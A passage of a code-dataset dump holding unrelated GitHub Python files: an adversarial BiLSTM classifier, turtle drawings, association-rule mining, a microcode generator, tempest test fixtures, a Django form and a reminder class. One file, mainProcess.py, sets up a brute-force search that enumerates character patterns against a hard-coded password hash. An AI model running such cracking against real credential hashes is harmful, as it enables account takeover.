\"\"\"文本分类,ablstm模型\"\"\"\n def __init__(self, config):\n self.config = config\n self.vocab_freqs = tf.constant(self.config.voc_freq, dtype=tf.float32, shape=(self.config.vocab_size, 1))\n # 三个待输入的数据\n self.input_x = tf.placeholder(tf.int32, [None, self.config.seq_length])\n self.input_y = tf.placeholder(tf.float32, [None, self.config.num_classes])\n self.keep_prob = tf.placeholder(tf.float32)\n self.is_training = tf.placeholder(tf.bool)\n\n self.ablstm()\n\n def cal_loss_logit(self,batch_embedded, keep_prob, W, W_fc, b_fc, batch_y, reuse=True, scope=\"loss\"):\n with tf.variable_scope(scope, reuse=reuse) as scope:\n rnn_outputs, _ = bi_rnn(BasicLSTMCell(self.config.hidden_dim), BasicLSTMCell(self.config.hidden_dim),\n inputs=batch_embedded, dtype=tf.float32)\n # Attention\n ATTENTION_SIZE = 50\n attention_output, alphas = attention(rnn_outputs, ATTENTION_SIZE, return_alphas=True)\n drop = tf.nn.dropout(attention_output, keep_prob)\n # Fully connected layer\n y_hat = tf.nn.xw_plus_b(drop, W_fc, b_fc)\n y_hat = tf.squeeze(y_hat)\n return y_hat, tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=y_hat, labels=batch_y))\n\n\n\n\n def ablstm(self):\n \"\"\"模型\"\"\"\n\n with 
tf.name_scope(\"input_embedding\"):\n embeddings_var = tf.Variable(\n tf.random_uniform([self.config.vocab_size, self.config.embedding_dim], -1.0, 1.0))\n weights = self.vocab_freqs / tf.reduce_sum(self.vocab_freqs)\n embedding_norm = normalize(embeddings_var, weights)\n print(\"embedding_norm'shape\", embedding_norm)\n batch_embedded = tf.nn.embedding_lookup(embedding_norm, self.input_x)\n print(\"batch_embedded'shape\", batch_embedded)\n\n\n with tf.name_scope(\"loss\"):\n W = tf.Variable(tf.random_normal([self.config.hidden_dim], stddev=0.1))\n #attention *2\n W_fc = tf.Variable(tf.truncated_normal([self.config.hidden_dim*2, self.config.num_classes], stddev=0.1))\n\n b_fc = tf.Variable(tf.constant(0., shape=[self.config.num_classes]))\n\n logits, cl_loss = self.cal_loss_logit(batch_embedded, self.keep_prob,W, W_fc, b_fc, self.input_y, reuse=False)\n embedding_perturbated = add_perturbation(batch_embedded, cl_loss,self.config.epsilon)\n ad_logits, ad_loss = self.cal_loss_logit(embedding_perturbated, self.keep_prob,\n W,W_fc, b_fc, self.input_y,reuse=True)\n\n self.loss = cl_loss + ad_loss\n\n self.optim = tf.train.AdamOptimizer(learning_rate=self.config.learning_rate).minimize(self.loss)\n\n self.y_pred_cls = tf.argmax(tf.nn.softmax(logits), 1) # 预测类别\n self.predict_label = tf.nn.top_k(tf.nn.softmax(logits), k=self.config.topk, sorted=True, name=None)\n\n\n\n with tf.name_scope(\"accuracy\"):\n # 准确率\n correct_pred = tf.equal(tf.argmax(self.input_y, 1), self.y_pred_cls)\n self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"githoo/rdc","sub_path":"abblstm/abblstm_model.py","file_name":"abblstm_model.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19208134466","text":"#Daniel Stulberg Huf turma 33D matricula 1920468\r\n\r\nimport turtle\r\ndan=turtle.Turtle()\r\n\r\n#1\r\ndef desenhaRetangulo(tart,cor,dist1,dist2):\r\n tart.color(cor)\r\n tart.fd(dist1)\r\n tart.rt(90)\r\n tart.fd(dist2)\r\n tart.rt(90)\r\n tart.fd(dist1)\r\n tart.rt(90)\r\n tart.fd(dist2)\r\n tart.rt(90)\r\n return\r\n\r\ndef desloca(tart,dist):\r\n tart.up()\r\n tart.fd(dist)\r\n tart.down()\r\n return\r\n\r\ndan.shape('turtle')\r\ndan.width(2)\r\ndan.lt(180)\r\ndesenhaRetangulo(dan,'black',100,50)\r\ndan.rt(180)\r\ndesloca(dan,100)\r\ndan.lt(180)\r\ndesenhaRetangulo(dan,'brown',100,50)\r\ndesloca(dan,100)\r\ndan.lt(90)\r\ndesloca(dan,50)\r\ndan.rt(90)\r\ndesenhaRetangulo(dan,'yellow',100,50)\r\ndan.rt(180)\r\ndesloca(dan,100)\r\ndan.lt(180)\r\ndesenhaRetangulo(dan,'blue',100,50)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"danielhuf/puc-introducao-programacao","sub_path":"Teste_resolvido1.py","file_name":"Teste_resolvido1.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1449117618","text":"import math\nfrom itertools import combinations\nfrom itertools import permutations\n\ndef read_dataset(filename):\n\tlines = open(filename).readlines()\n\titems = lines[0].split(',')\n\tdata = []\n\tfor line in lines[1:]:\n\t\tdata.append(list(map(int, line.split(','))))\n\treturn { 'items': items, 'data': data }\n\ndef get_freq(data, items, s):\n\tfreq = 0\n\tfor d in data:\n\t\ttemp = 1\n\t\tfor i in s:\n\t\t\ttemp *= d[items.index(i)]\n\t\tif temp >= 1:\n\t\t\tfreq += 1\n\treturn freq\n\ndef get_itemsets(data, items, level):\n\tsets = 
set(combinations(items, level))\n\titem_sets = []\n\tfor s in sets:\n\t\tif(get_freq(data, items, s) >= min_freq):\n\t\t\titem_sets.append(s)\n\treturn item_sets\n\ndef print_rules(rules):\n\t#[start, end, confidence]\n\tfor rule in rules:\n\t\tprint(str(rule[0]) + \"\\t\\t-------->\\t\\t\" + str(rule[1]) + \"\\t\\t\" + str(rule[2]))\n\ndataset = read_dataset('market.csv')\nmin_freq_perc = 40\nmin_freq = math.ceil((min_freq_perc/100.0)*len(dataset['data']))\nmin_confidence_perc = 50 #confidence\n\nrules = []\nfor l in range(2, len(dataset['items']) + 1):\n\titemset = get_itemsets(dataset['data'], dataset['items'], l)\n\tif(len(itemset) == 0):\n\t\tbreak\n\t# print(\"Level: \" + str(l) + \": \\n\" + str(itemset) + \"\\n\\n\")\n\tfor s in itemset:\n\t\tfreq_s = get_freq(dataset['data'], dataset['items'], s)\n\t\tperms = list(permutations(s))\n\t\tfor _s in perms:\n\t\t\tfor i in range(0, len(_s) - 1):\n\t\t\t\tx = _s[0:i+1]\n\t\t\t\ty = _s[i+1:]\n\t\t\t\tfreq_x = get_freq(dataset['data'], dataset['items'], x)\n\t\t\t\tc = float(freq_s)/float(freq_x)\n\t\t\t\tif c*100 >= min_confidence_perc:\n\t\t\t\t\trules.append([x, y, c])\n\nprint(\"\\nGenerated Rules:\")\nprint_rules(rules)\n\n","repo_name":"virajvchavan/Data-Mining","sub_path":"association_rules/association_rules.py","file_name":"association_rules.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33422075713","text":"#!/usr/bin/env python3\n\nimport sys\nfrom textwrap import dedent\n\n######################\n#### control bits ####\n######################\n\n# Do# - Data-bus output selector.\n# 0b00: none\n# 0b01: Program ROM\n# 0b10: Reserved\n# 0b11: Register-B\n# Dl# - Data-bus load selector.\n# 0b00: none\n# 0b01: Instruction pointer\n# 0b10: Register-A\n# 0b11: Register-B\n# Ao# - Address-bus output selector.\n# 0b0: none\n# 0b1: Instruction pointer\n# MCl - Instruction load (microinstruction register load)\n# Abs - Register-A bus select\n# L: Data-bus\n# H: Address-bus\n# ADc - ALU/ADD carry\n# ADo - ALU/ADD output\n# PCr - Program-counter reset\n# RAo - Register-A output\n# RFl - Flags-Register load\n# Flc - Load instruction pointer only if flags carry bit is set. 
(jump-if-carry)\n\nDo0, Do1, Do2, Do3 = 0b00, 0b01, 0b10, 0b11\nDl0, Dl1, Dl2, Dl3 = 0b00 << 2, 0b01 << 2, 0b10 << 2, 0b11 << 2\nAo0, Ao1 = 0b0 << 4, 0b1 << 4\nMCl = 0b1 << 5\nAbs = 0b1 << 6\nADc = 0b1 << 7\nADo = 0b1 << 8\nPCr = 0b1 << 9\nRAo = 0b1 << 10\nRFl = 0b1 << 11\nFlc = 0b1 << 12\n\nINC_IP = Do0|Dl1|Ao1|ADc|ADo # increment instruction pointer\nNEXT = Ao1|MCl # execute next instruction\n\nspec = [\n (\n 'reset => 0x{0:1x}',\n [Do0|Dl1, Do0|Dl2, Do0|Dl3, NEXT|PCr],\n ),\n (\n 'nop => 0x{0:1x}',\n [INC_IP, NEXT],\n ),\n (\n 'load a, {{value}} => 0x{0:1x} @ value`4',\n [INC_IP, Do1|Dl2|Ao1, INC_IP, NEXT],\n ),\n (\n 'load b, {{value}} => 0x{0:1x} @ value`4',\n [INC_IP, Do1|Dl3|Ao1, INC_IP, NEXT],\n ),\n (\n 'inc a => 0x{0:1x}',\n [RAo|Dl2|Abs|ADc|ADo|RFl, INC_IP, NEXT],\n ),\n (\n 'mov a, b => 0x{0:1x}',\n [RAo|Dl3, INC_IP, NEXT],\n ),\n (\n 'mov b, a => 0x{0:1x}',\n [Do3|Dl2, INC_IP, NEXT],\n ),\n (\n 'jmp {{value}} => 0x{0:1x} @ value`4',\n [INC_IP, Do1|Dl1|Ao1, NEXT],\n ),\n (\n 'jc {{value}} => 0x{0:1x} @ value`4',\n [INC_IP, Do1|Dl1|Ao1|Flc, NEXT|Flc, INC_IP, NEXT],\n ),\n]\n\nmicrocode = []\nruledef = []\n\nfor i, v in enumerate(spec):\n rule, uops = v\n microcode.append(\"{:d}: {:s}\".format(i*16, ' '.join([str(v) for v in uops])))\n ruledef.append(\"\\t\" + rule.format(i))\n\nprint(\"Microcode:\", file=sys.stderr)\nprint(\"\\n\".join(microcode))\n\nprint(file=sys.stderr)\n\nprint(\"Assembler definition:\", file=sys.stderr)\nprint(dedent(\"\"\"\n #bits 4\n #bankdef prg { #addr 0x0, #size 0x10, #outp 0x0 }\n #bank prg\n \"\"\").strip())\nprint(\"#ruledef\")\nprint(\"{\")\nprint(\"\\n\".join(ruledef))\nprint(\"}\")\n","repo_name":"Izzette/circuitjs-computer","sub_path":"microcode.py","file_name":"microcode.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72083956947","text":"from config_tempest import api_discovery as api\nfrom config_tempest import config_tempest as tool\nfrom fixtures import MonkeyPatch\nimport json\nimport mock\nfrom oslotest import base\n\n\nclass BaseConfigTempestTest(base.BaseTestCase):\n\n \"\"\"Test case base class for all config_tempest unit tests\"\"\"\n\n def _get_conf(self, V2, V3):\n \"\"\"Creates fake conf for testing purposes\"\"\"\n conf = tool.TempestConf()\n uri = \"http://172.16.52.151:5000/\"\n conf.set(\"identity\", \"username\", \"demo\")\n conf.set(\"identity\", \"password\", \"secret\")\n conf.set(\"identity\", \"tenant_name\", \"demo\")\n conf.set(\"identity\", \"disable_ssl_certificate_validation\", \"true\")\n conf.set(\"identity\", \"auth_version\", \"v3\")\n conf.set(\"identity\", \"uri\", uri + V2, priority=True)\n conf.set(\"identity\", \"uri_v3\", uri + V3)\n conf.set(\"identity\", \"admin_username\", \"admin\")\n conf.set(\"identity\", \"admin_tenant_name\", \"adminTenant\")\n conf.set(\"identity\", \"admin_password\", \"adminPass\")\n conf.set(\"auth\", \"use_dynamic_credentials\", \"False\")\n return conf\n\n def _get_alt_conf(self, V2, V3):\n \"\"\"Contains newer params in place of the deprecated params\"\"\"\n conf = tool.TempestConf()\n uri = \"http://172.16.52.151:5000/\"\n conf.set(\"identity\", \"username\", \"demo\")\n conf.set(\"identity\", \"password\", \"secret\")\n conf.set(\"identity\", \"tenant_name\", \"demo\")\n conf.set(\"identity\", \"disable_ssl_certificate_validation\", \"true\")\n conf.set(\"identity\", \"auth_version\", \"v3\")\n conf.set(\"identity\", \"uri\", uri + V2, priority=True)\n 
conf.set(\"identity\", \"uri_v3\", uri + V3)\n conf.set(\"auth\", \"admin_username\", \"admin\")\n conf.set(\"auth\", \"admin_project_name\", \"adminTenant\")\n conf.set(\"auth\", \"admin_password\", \"adminPass\")\n conf.set(\"auth\", \"use_dynamic_credentials\", \"True\")\n return conf\n\n @mock.patch('os_client_config.cloud_config.CloudConfig')\n def _get_clients(self, conf, mock_args, admin=False):\n \"\"\"Returns ClientManager instance\"\"\"\n mock_function = mock.Mock(return_value=False)\n func2mock = 'os_client_config.cloud_config.CloudConfig.config.get'\n self.useFixture(MonkeyPatch(func2mock, mock_function))\n return tool.ClientManager(conf, admin=admin)\n\n\nclass BaseServiceTest(base.BaseTestCase):\n\n \"\"\"Test case base class for all api_discovery unit tests\"\"\"\n\n FAKE_TOKEN = \"s6d5f45sdf4s564f4s6464sdfsd514\"\n FAKE_HEADERS = {\n 'Accept': 'application/json', 'X-Auth-Token': FAKE_TOKEN\n }\n FAKE_URL = \"http://10.200.16.10:8774/\"\n FAKE_VERSIONS = (\n {\n \"versions\": [{\n \"status\": \"SUPPORTED\",\n \"updated\": \"2011-01-21T11:33:21Z\",\n \"links\": [{\n \"href\": \"http://10.200.16.10:8774/v2 / \",\n \"rel\": \"self \"\n }],\n \"min_version\": \"\",\n \"version\": \"\",\n \"id\": \"v2.0\",\n \"values\": [\n {\"id\": 'v3.8'}\n ]\n }, {\n \"status\": \"CURRENT\",\n \"updated\": \"2013-07-23T11:33:21Z\",\n \"links\": [{\n \"href\": \"http://10.200.16.10:8774/v2.1/\",\n \"rel\": \"self\"\n }],\n \"min_version\": \"2.1\",\n \"version\": \"2.41\",\n \"id\": \"v2.1\",\n \"values\": [\n {\"id\": 'v2.0'}\n ]\n }]\n }\n )\n FAKE_IDENTITY_VERSIONS = (\n {\n 'versions': {\n 'values': [{\n 'status': 'stable',\n 'id': 'v3.8',\n }, {\n 'status': 'deprecated',\n 'id': 'v2.0',\n }]\n }\n }\n )\n FAKE_EXTENSIONS = (\n {\n \"extensions\": [{\n \"updated\": \"2014-12-03T00:00:00Z\",\n \"name\": \"Multinic\",\n \"namespace\": \"http://docs.openstack.org/compute/ext/fake_xml\",\n \"alias\": \"NMN\",\n \"description\": \"Multiple network support.\"\n }, {\n \"updated\": \"2014-12-03T00:00:00Z\",\n \"name\": \"DiskConfig\",\n \"namespace\": \"http://docs.openstack.org/compute/ext/fake_xml\",\n \"alias\": \"OS-DCF\",\n \"description\": \"Disk Management Extension.\"\n }]\n }\n )\n FAKE_IDENTITY_EXTENSIONS = (\n {\n \"extensions\": {\n 'values': [{\n 'alias': 'OS-DCF',\n 'id': 'v3.8',\n }, {\n 'alias': 'NMN',\n 'id': 'v2.0',\n }]\n }\n }\n )\n FAKE_STORAGE_EXTENSIONS = (\n {\n \"formpost\": {},\n \"methods\": [\"GET\", \"HEAD\", \"PUT\", \"POST\", \"DELETE\"],\n \"ratelimit\": {\n \"account_ratelimit\": 0.0,\n \"max_sleep_time_seconds\": 60.0,\n \"container_ratelimits\": []\n },\n \"account_quotas\": {},\n \"swift\": {\n \"container_listing_limit\": 10000,\n \"allow_account_management\": True,\n \"max_container_name_length\": 256\n }\n }\n )\n\n class FakeRequestResponse(object):\n URL = 'http://docs.openstack.org/api/openstack-identity/3/ext/'\n FAKE_V3_EXTENSIONS = (\n {\n 'resources': {\n URL + 'OS-INHERIT/1.0/rel/domain_user_'\n + 'role_inherited_to_projects': \"\",\n\n URL + 'OS-SIMPLE-CERT/1.0/rel/ca_certificate': \"\",\n\n URL + 'OS-EP-FILTER/1.0/rel/endpoint_group_to_'\n + 'project_association': \"\",\n\n URL + 'OS-EP-FILTER/1.0/rel/project_endpoint': \"\",\n\n URL + 'OS-OAUTH1/1.0/rel/user_access_token_roles': \"\"\n }\n }\n )\n\n def __init__(self):\n self.content = json.dumps(self.FAKE_V3_EXTENSIONS)\n\n def _fake_service_do_get_method(self, fake_data):\n function2mock = 'config_tempest.api_discovery.Service.do_get'\n do_get_output = json.dumps(fake_data)\n mocked_do_get = 
mock.Mock()\n mocked_do_get.return_value = do_get_output\n self.useFixture(MonkeyPatch(function2mock, mocked_do_get))\n\n def _test_get_service_class(self, service, cls):\n resp = api.get_service_class(service)\n self.assertEqual(resp, cls)\n\n def _get_extensions(self, service, expected_resp, fake_data):\n self._fake_service_do_get_method(fake_data)\n resp = service.get_extensions()\n self.assertItemsEqual(resp, expected_resp)\n\n def _test_deserialize_versions(self, service, expected_resp, fake_data):\n resp = service.deserialize_versions(fake_data)\n self.assertItemsEqual(resp, expected_resp)\n","repo_name":"mail2nsrajesh/python-tempestconf","sub_path":"config_tempest/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41597741454","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 9 21:27:39 2023\n\n@author: Admin\n\"\"\"\n\ndef match_lists(master, to_filter):\n res=[]\n for m in master:\n res.extend([f for f in to_filter if f.startswith(m) and len(f)>len(m)])\n return res\n\nimport pandas as pd\n\n# Set the folder path to the .csv file created by the fiber_cone tool\nfpath=\"D:\\\\Data\\\\Folder\\\\\"\n# Set the suffix of the .csv filenames\nftype=\"_aligned_cones_x_th_x_ROIs.csv\"\n# Generate the list of file prefixes\nfprefix=[\"jy\"+str(i+1).zfill(2) for i in range(17)]\n\n\n# Define the list of brain areas to include into the results\nselect_grand_areas=[\"VISC1\",\"VISC2/3\",\"VISC4\",\"VISC5\",\"VISC6a\", \"SSs1\",\"SSs2/3\",\"SSs4\",\"SSs5\",\"SSs6a\", \"SSp\", \"AIp1\",\"AIp2/3\",\"AIp5\",\"AIp6a\",\"TEa\", \"AUDv\", \"ECT\", \"PERI\", \"ENT\", \"CLA\", \"EPd\", \"EPv\", \"PIR\"]\n\n\nfibers=[\"cone1\",\"cone2\"]\n\ndf_pools=[pd.DataFrame()]\n\nfor f in fibers:\n df_pools.append(pd.DataFrame())\n\n\nfor fp in fprefix:\n df=pd.read_csv(fpath+fp+ftype, index_col=0, encoding='cp1252')\n df[\"brain_area\"]=df[\"Label\"].apply(lambda row: row.split(\" x \")[2])\n df[\"cone\"]=df[\"Label\"].apply(lambda row: row.split(\" x \")[0].split(\"_\")[0])\n brain_areas=list(df[\"brain_area\"].unique())\n \n volumes=[]\n slices=[]\n \n df_cones=[df]\n for c in fibers:\n df_cones.append(df.where(df[\"cone\"]==c).dropna())\n \n res_df_alls=[]\n \n for l, dff in enumerate(df_cones):\n volumes.append([])\n slices.append([])\n for br in brain_areas:\n df_br=dff.where(dff[\"brain_area\"]==br).dropna()\n volumes[l].append(df_br[\"Area (µm^2)\"].sum())\n slices[l].append(\",\".join([str(int(s)) for s in df_br[\"Slice\"].to_list()]))\n d={\"Animal\":fp, \"Brain area\":brain_areas, \"Total area (µm^2)\":volumes[l], \"List of slices\":slices[l]}\n res_df_alls.append(pd.DataFrame(data=d))\n res_df_alls[l].sort_values(by=[\"Brain area\"], axis=0, ascending=True, inplace=True, ignore_index=True)\n \n \n #selected_areas=match_lists(select_grand_areas, brain_areas)\n \n for m, res_dfs in enumerate(res_df_alls):\n res_df_grands=res_dfs[res_dfs[\"Brain area\"].isin(select_grand_areas)].copy()\n for br in select_grand_areas:\n if br not in res_dfs[\"Brain area\"].tolist():\n d={\"Animal\":fp, \"Brain area\":br, \"Total area (µm^2)\":0.0, \"List of slices\":[]}\n res_df_grands=pd.concat([res_df_grands,pd.DataFrame([d])], ignore_index=True)\n tot_a=res_df_grands[\"Total area (µm^2)\"].sum()\n #df_grands=res_df_all[res_df_all[\"Brain area\"].isin(grand_areas)].copy()\n #total_grands=df_grands[\"Total area (µm^2)\"].sum()\n #d_grands={\"Animal\":fp, \"Brain 
area\":\"Others\", \"Total area (µm^2)\":total_grands-tot_a, \"List of slices\":\"\"}\n #res_df_grands=res_df_grands.append(d_grands, ignore_index = True)\n res_df_grands[\"Norm. area\"]=res_df_grands[\"Total area (µm^2)\"].apply(lambda row: row/tot_a*100)\n df_pools[m]=pd.concat([df_pools[m],res_df_grands], ignore_index = True)\n \npooled_brain_areas=[] \n \nfor k, dfs in enumerate(df_pools):\n dfs.reset_index()\n pooled_brain_areas.append(list(dfs[\"Brain area\"].unique()))\n pooled_brain_areas[k].sort()\n #pooled_brain_areas.remove(\"Others\")\n #pooled_brain_areas.append(\"Others\")\n\nprint(pooled_brain_areas[0],pooled_brain_areas[1],pooled_brain_areas[2])\n\nfnames=[\"BOTH\",\"CONE1\",\"CONE2\"]\n\nfor k, dfs in enumerate(df_pools):\n\n df_summary_abs=pd.DataFrame()\n df_summary_norm=pd.DataFrame()\n \n for fp in fprefix:\n d_abs_data={\"Animal\":fp}\n d_norm_data={\"Animal\":fp}\n df_per_mouse=dfs[dfs['Animal']==fp]\n for br in pooled_brain_areas[k]:\n abs_area=df_per_mouse[df_per_mouse['Brain area']==br][\"Total area (µm^2)\"]\n norm_area=df_per_mouse[df_per_mouse['Brain area']==br][\"Norm. area\"]\n if (abs_area.shape[0]>0):\n d_abs_data[br]=abs_area.item()\n d_norm_data[br]=norm_area.item()\n else:\n d_abs_data[br]=0\n d_norm_data[br]=0\n df_summary_abs=pd.concat([df_summary_abs, pd.DataFrame([d_abs_data])], axis=0, ignore_index = True)\n df_summary_norm=pd.concat([df_summary_norm, pd.DataFrame([d_norm_data])], axis=0, ignore_index = True)\n \n pooled_brain_areas[k].insert(0,\"Animal\")\n df_summary_abs=df_summary_abs[pooled_brain_areas[k]]\n df_summary_norm=df_summary_norm[pooled_brain_areas[k]]\n \n dfs.to_csv(fpath+fnames[k]+ftype)\n df_summary_abs.to_csv(fpath+fnames[k]+\"_SUMMARY_ABS\"+ftype)\n df_summary_norm.to_csv(fpath+fnames[k]+\"_SUMMARY_NORM\"+ftype)","repo_name":"bmi-lsym/Optogenetic_PostHoc_Validator","sub_path":"cones_vs_threshold_vs_atlas_processing.py","file_name":"cones_vs_threshold_vs_atlas_processing.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4603879604","text":"# -*-coding:utf-8 -*-\n'''\nCreated on 2013-11-2\n\n@author: Danny<manyunkai@hotmail.com>\nDannyWork Project\n'''\n\nfrom django import forms\nfrom django.conf import settings\n\nfrom dshare.models import Photo\nfrom common.image_utils import ModelImageParser, GenericImageParser\n\n\nclass PhotoForm(forms.ModelForm):\n def clean(self):\n if 'image' in self.changed_data:\n image = self.cleaned_data.get('image', None)\n if image:\n handler = GenericImageParser([image], settings.PHOTO_CONF)\n if not handler.is_valid():\n self._errors['image'] = self.error_class([handler.error])\n else:\n self._errors['image'] = self.error_class([u'上传的图片无效'])\n return self.cleaned_data\n\n def save(self, commit=True):\n result = super(PhotoForm, self).save(commit=commit)\n result.save()\n\n if 'image' in self.changed_data:\n handler = ModelImageParser(result.image.path, settings.PHOTO_CONF)\n handler.parse()\n handler.save()\n\n if handler.parsed.size[0] > 950:\n result.has_large_size = True\n else:\n result.has_large_size = False\n result.save()\n\n return result\n\n class Meta:\n model = Photo\n widgets = {\n 'description': forms.Textarea\n }\n","repo_name":"RyanLyu/dannysite.com","sub_path":"src/dshare/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"2408150969","text":"#from crypt 
import crypt\nfrom passlib.hash import sha256_crypt as sha256\nfrom loopCodeProcess import LoopCodeProcess\nimport time\n\nif __name__ == '__main__':\n\t################\n\t# PARAMETERS #\n\t################\n\n\t#Bases\n\tmajuscule = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\tmajLen = len(majuscule)\n\n\tminuscule = 'abcdefghijklmnopqrstuvwxyz'\n\tminLen = len(minuscule)\n\n\tsymbole = '!'\n\tsymLen = len(symbole)\n\n\tchiffre = '0123456789'\n\tchiLen = len(chiffre)\n\n\t################\n\t# MAIN PROGRAM #\n\t################\n\n\t#Encryption parameters\n\ttabBase = [majuscule, minuscule, minuscule, minuscule, symbole, chiffre, chiffre, chiffre]\n\tmySalt = 'KS'\n\tsearchWord='KSIdqhF5l6N2s'\n\n\t#Show estimation\n\tnbComb = 1\n\tfor base in tabBase:\n\t\tnbComb = nbComb * len(base)\n\tprint(\"Number of combinaison \", nbComb)\n\n\tmyLoop = LoopCodeProcess(0, 3, searchWord, mySalt, tabBase) \n\t#myLoop2 = LoopCode(4, 7, searchWord, mySalt, tabBase) \n\tmyLoop.start()\n\t#myLoop2.start()\n\n\t#Sleep for 10 secs\n\ttime.sleep(1)\n\tprint(str(myLoop.getLoopCount()))\n\ttime.sleep(1)\n\tmyLoop.stop()\n\tprint(str(myLoop.getLoopCount()))\n\tmyLoop.terminate()\n\tprint(str(myLoop.getLoopCount()))\n\tprint(myLoop.getCurrent())\n\n\t#ten_loop_code(searchWord, mySalt, tabBase)\n\n\n\n\n\n","repo_name":"chimeji/python_pj","sub_path":"alphabet/old/mainProcess.py","file_name":"mainProcess.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10483108782","text":"class ReminderTime:\n    def __init__(self, allDay, year, month, day, hour = 0, minute = 0, endhour = 0, endminute = 0):\n        self.allDay = allDay\n        self.year = year\n        self.month = month\n        self.day = day\n        self.hour = hour\n        self.minute = minute\n        self.endhour = endhour\n        self.endminute = endminute\n        self.starttime = str(hour) + \":\" + str(minute).zfill(2)\n        self.endtime = str(endhour) + \":\" + str(endminute).zfill(2)\n\n    def __str__(self):\n        if self.allDay:\n            return '{}/{}/{}'.format(self.year, str(self.month).zfill(2), str(self.day).zfill(2))\n        if self.endhour == 0:\n            return '{}/{}/{} {}'.format(self.year, str(self.month).zfill(2), str(self.day).zfill(2), self.starttime)\n        return '{}/{}/{} {}-{}'.format(self.year, str(self.month).zfill(2), str(self.day).zfill(2), self.starttime, self.endtime)\n\n    def __lt__(self, other):\n        if self.year < other.year:\n            return True\n        if self.year > other.year:\n            return False\n        if self.month < other.month:\n            return True\n        if self.month > other.month:\n            return False\n        if self.day < other.day:\n            return True\n        if self.day > other.day:\n            return False\n        if self.allDay or other.allDay:\n            return True\n        if self.hour < other.hour:\n            return True\n        if self.hour > other.hour:\n            return False\n        if self.minute < other.minute:\n            return True\n        if self.minute > other.minute:\n            return False\n\n    def __gt__(self, other):\n        if self.year > other.year:\n            return True\n        if self.year < other.year:\n            return False\n        if self.month > other.month:\n            return True\n        if self.month < other.month:\n            return False\n        if self.day > other.day:\n            return True\n        if self.day < other.day:\n            return False\n        if self.allDay or other.allDay:\n            return True\n        if self.hour > other.hour:\n            return True\n        if self.hour < other.hour:\n            return False\n        if self.minute > other.minute:\n            return True\n        if self.minute < other.minute:\n            return False\n\n    def __eq__(self, other):\n        if self.year == other.year and self.month == other.month and self.day == other.day and self.hour == other.hour and self.minute == other.minute:\n            return True\n        return False\n\n    def overlapsWith(self, timeOther): # returns True if two reminders overlap, False if they don't\n        if self.day == timeOther.day and self.month == timeOther.month and self.year == timeOther.year: # change this to use > < if time\n            if self.allDay:\n                return True\n            if (self.hour <= timeOther.endhour and self.hour >= timeOther.hour):\n                if self.hour == timeOther.endhour:\n                    if self.minute < timeOther.minute:\n                        return True\n                if self.hour == timeOther.hour:\n                    if self.minute>timeOther.endminute:\n                        return True\n                return True\n            if (self.endhour < timeOther.endhour and self.endhour > timeOther.hour):\n                if self.endhour == timeOther.endhour:\n                    if self.endminute < timeOther.minute:\n                        return True\n                if self.endhour == timeOther.hour:\n                    if self.endminute > timeOther.endminute:\n                        return True\n                return True\n        return False\n","repo_name":"joying-yang/Web-Surfing-Without-Wifi","sub_path":"app/reminderTime.py","file_name":"reminderTime.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41071897567","text":"import json\nfrom scraper import Scraper\nimport os\nfrom typing import Union, Any, List\nfrom config import Config\n\n\nclass Data():\n\n    @classmethod\n    def store(cls, userInput: str) -> str:\n        \"\"\"Store scraped data into json file\"\"\"\n        scan: List[Any] = Scraper.quotes_by_author(userInput, 10) # type: ignore\n\n        if os.stat(Config.PATH).st_size == 0:\n            if len(scan) == 0 or scan[0] is None:\n                return f\"\\nSorry, we couldn't find anything for '{userInput}'\\n\"\n            else:\n                with open(Config.PATH, \"w\") as data:\n                    json_quotes = json.dumps(scan)\n                    data.write(json_quotes)\n                return \"\\nLibrary updated!\\n\"\n        else:\n            json_decoder: Union[List[dict], str] = Data.load(Config.PATH)\n            if len(scan) > 0:\n                for quote in scan:\n                    json_decoder.append(quote) # type: ignore\n                Data.save(Config.PATH, json_decoder) # type: ignore\n                return \"\\nLibrary updated!\\n\"\n            else:\n                return \"\\nSorry, we did not recognise this author/title\\n\"\n\n    @classmethod\n    def save(cls, path: str, data: str) -> Union[bool, str]:\n        \"\"\"Save into JSON datatype\"\"\"\n        try:\n            with open(path, \"w\") as file_handler:\n                json_string = json.dumps(data)\n                file_handler.write(json_string)\n                return True\n        except (KeyboardInterrupt, SystemExit):\n            return \"\\nSorry, there is nothing to open.\\n\"\n\n    @classmethod\n    def load(cls, path: str) -> Union[list, str]:\n        \"\"\"Convert JSON datatype and return as Python datatype\"\"\"\n        try:\n            with open(path, \"r\") as data:\n                raw_json = data.readline()\n                quotes = json.loads(raw_json)\n                return quotes\n        except (KeyboardInterrupt, SystemExit):\n            return \"\\nSorry, there is nothing to 